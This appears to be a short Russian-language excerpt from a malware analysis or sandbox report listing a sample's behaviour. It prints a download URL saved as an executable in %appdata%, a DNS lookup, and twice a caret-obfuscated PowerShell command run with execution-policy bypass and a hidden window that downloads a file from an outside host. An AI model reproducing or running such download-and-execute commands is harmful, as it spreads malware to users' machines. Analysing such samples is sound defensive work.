Техническая информация
- http://www.fopeioaas.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^O^Wer^sHEl^l.ex^e ^-e^XeC^uTIonpOLiCY^ bYp^A^ss ^-NO^p^rOFIL^E^ ^-^WIN^dOWStyle^ HId^dE^N (NeW^-^ObJEct ^S^YS^t^E^M.N^eT^.^w^eB^CL^i^e^NT^).d^OW^NlOA^dfil^e('http://www.fopei...
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /C "p^O^Wer^sHEl^l.ex^e ^-e^XeC^uTIonpOLiCY^ bYp^A^ss ^-NO^p^rOFIL^E^ ^-^WIN^dOWStyle^ HId^dE^N (NeW^-^ObJEct ^S^YS^t^E^M.N^eT^.^w^eB^CL^i^e^NT^).d^OW^NlOA^dfil^e('http://www.fopei...' (со скрытым окном)